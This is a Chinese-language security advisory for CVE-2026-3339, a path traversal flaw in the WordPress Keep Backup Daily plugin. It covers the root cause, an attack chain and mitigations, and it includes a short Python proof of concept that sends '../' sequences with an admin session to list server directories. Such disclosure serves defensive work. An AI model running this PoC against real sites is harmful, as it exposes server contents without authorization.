IPBUF安全漏洞报告
English
CVE-2026-3339 CVSS 2.7 低危

CVE-2026-3339 WordPress插件路径遍历漏洞

披露日期: 2026-03-21
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-3339
漏洞类型
路径遍历
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
WordPress Keep Backup Daily插件

相关标签

路径遍历WordPressKeep Backup Daily信息泄露CVE-2026-3339

漏洞概述

WordPress Keep Backup Daily插件在所有版本(包括2.1.1及以下)中存在有限的路径遍历漏洞。该漏洞源于`kbd_open_upload_dir` AJAX动作对`kbd_path`参数的验证不足,仅使用了`sanitize_text_field()`函数进行清理,而该函数无法去除路径遍历序列。这使得拥有管理员及以上权限的经过身份验证的攻击者能够列出服务器上预期上传目录之外的任意目录内容,从而导致敏感信息泄露。

技术细节

该漏洞的根本原因在于开发人员对输入清理函数的误用。插件在处理`kbd_open_upload_dir` AJAX请求时,接收用户提交的`kbd_path`参数,并期望通过`sanitize_text_field()`函数确保安全性。然而,`sanitize_text_field()`主要用于防止跨站脚本(XSS)攻击,它会移除HTML标签、八位组和额外的空格,但并不处理路径遍历字符(如`../`或`..\`)。因此,当攻击者具有管理员权限时,可以构造包含`../`序列的恶意参数(例如`../../../../etc/passwd`)。服务器端代码在未进行路径规范化或前缀检查的情况下,直接使用该参数作为路径参数调用文件系统函数(如`scandir`)。这将允许攻击者突破预定义的备份目录限制,遍历并读取服务器文件系统的其他目录结构。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标站点安装了存在漏洞的Keep Backup Daily插件版本(<= 2.1.1)。
STEP 2
2. 获取权限
攻击者通过钓鱼、暴力破解或其他手段获取目标WordPress站点管理员或更高权限的账户凭据。
STEP 3
3. 漏洞利用
攻击者使用管理员权限向`/wp-admin/admin-ajax.php`发送POST请求,设置`action`为`kbd_open_upload_dir`,并在`kbd_path`参数中注入路径遍历序列(如`../`)。
STEP 4
4. 数据泄露
服务器响应返回指定目录的文件列表,攻击者借此读取非预期的敏感目录内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # This script requires a valid administrator session cookie target_url = "http://example.com/wp-admin/admin-ajax.php" admin_cookie = "wordpress_logged_in_xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # The vulnerable action and parameter payload_data = { "action": "kbd_open_upload_dir", "kbd_path": "../../../../" # Attempt to list the root directory or system folders } headers = { "Cookie": admin_cookie, "User-Agent": "Mozilla/5.0 (PoC-Scanner)" } try: response = requests.post(target_url, data=payload_data, headers=headers) if response.status_code == 200: print("[+] Request successful. Potential directory listing found:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Keep Backup Daily <= 2.1.1

防御指南

临时缓解措施
如果无法立即更新插件,建议暂时禁用Keep Backup Daily插件以消除风险。此外,可以通过修改服务器配置(如Apache的.htaccess或Nginx配置规则),严格限制对`wp-admin/admin-ajax.php`接口的访问,或者配置服务器文件系统权限,防止Web进程读取Web根目录之外的敏感文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表